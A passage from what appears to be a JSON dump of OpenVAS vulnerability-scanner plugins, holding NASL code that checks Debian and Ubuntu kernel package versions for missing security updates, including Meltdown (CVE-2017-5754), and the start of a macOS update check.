ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-rt-686-pae\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-rt-amd64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-s390x\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-4kc-malta\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-4kc-malta-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-5kc-malta\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-5kc-malta-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-686\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-686-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-686-pae\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-686-pae-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-amd64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-amd64-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-arm64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-arm64-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-armmp\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-armmp-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-armmp-lpae\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-armmp-lpae-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-loongson-3\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-loongson-3-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-marvell\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-marvell-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-octeon\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-octeon-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-powerpc64le\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-powerpc64le-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-rt-686-pae\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-rt-686-pae-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-rt-amd64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-rt-amd64-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-s390x\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-s390x-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-4kc-malta\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-4kc-malta-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-5kc-malta\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-5kc-malta-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-686\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-686-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-686-pae\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-686-pae-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-amd64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-amd64-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-arm64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-arm64-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-armmp\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-armmp-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-armmp-lpae\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-armmp-lpae-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-loongson-3\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-loongson-3-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-marvell\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-marvell-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-octeon\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-octeon-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-powerpc64le\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-powerpc64le-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-rt-686-pae\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-rt-686-pae-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-rt-amd64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-rt-amd64-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-s390x\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-4-s390x-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-4kc-malta\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-4kc-malta-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-5kc-malta\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-5kc-malta-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-686\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-686-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-686-pae\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-686-pae-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-amd64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-amd64-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-arm64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-arm64-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-armmp\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-armmp-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-armmp-lpae\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-armmp-lpae-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-loongson-3\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-loongson-3-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-marvell\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-marvell-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-octeon\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-octeon-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-powerpc64le\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-powerpc64le-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-rt-686-pae\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-rt-686-pae-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-rt-amd64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-rt-amd64-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-s390x\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-s390x-dbg\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-kbuild-4.9\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-manual-4.9\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-perf-4.9\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-source-4.9\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-support-4.9.0-3\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-support-4.9.0-4\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-support-4.9.0-5\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"usbip\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-05-29T18:33:24", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-01-10T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux USN-3524-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5754"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310843410", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843410", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3524_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3524-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843410\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-01-10 07:40:05 +0100 (Wed, 10 Jan 2018)\");\n script_cve_id(\"CVE-2017-5754\");\n script_tag(name:\"cvss_base\", value:\"4.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3524-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Jann Horn discovered that microprocessors\n utilizing speculative execution and indirect branch prediction may allow\n unauthorized memory reads via sidechannel attacks. This flaw is known as\n Meltdown. A local attacker could use this to expose sensitive information,\n including kernel memory. (CVE-2017-5754)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3524-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3524-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-139-generic\", ver:\"3.13.0-139.188\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-139-lowlatency\", ver:\"3.13.0-139.188\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"3.13.0.139.148\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"3.13.0.139.148\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-05-29T18:33:19", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-01-10T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux USN-3522-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5754"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310843412", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843412", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3522_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3522-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843412\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-01-10 07:40:10 +0100 (Wed, 10 Jan 2018)\");\n script_cve_id(\"CVE-2017-5754\");\n script_tag(name:\"cvss_base\", value:\"4.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3522-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Jann Horn discovered that microprocessors\n utilizing speculative execution and indirect branch prediction may allow\n unauthorized memory reads via sidechannel attacks. This flaw is known as\n Meltdown. A local attacker could use this to expose sensitive information,\n including kernel memory. (CVE-2017-5754)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3522-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3522-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1015-kvm\", ver:\"4.4.0-1015.20\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1047-aws\", ver:\"4.4.0-1047.56\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-108-generic\", ver:\"4.4.0-108.131\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-108-lowlatency\", ver:\"4.4.0-108.131\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-9021-euclid\", ver:\"4.4.0-9021.22\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1047.49\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-euclid\", ver:\"4.4.0.9021.21\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.4.0.108.113\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-kvm\", ver:\"4.4.0.1015.15\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.4.0.108.113\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-07-17T14:22:48", "description": "This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-12-07T00:00:00", "type": "openvas", "title": "Apple MacOSX Security Updates(HT208331)-04", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13871", "CVE-2017-13865", "CVE-2017-13860", "CVE-2017-13858", "CVE-2017-13878", "CVE-2017-13876", "CVE-2017-13883", "CVE-2017-13848", "CVE-2017-13875"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310812408", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812408", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple MacOSX Security Updates(HT208331)-04\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812408\");\n 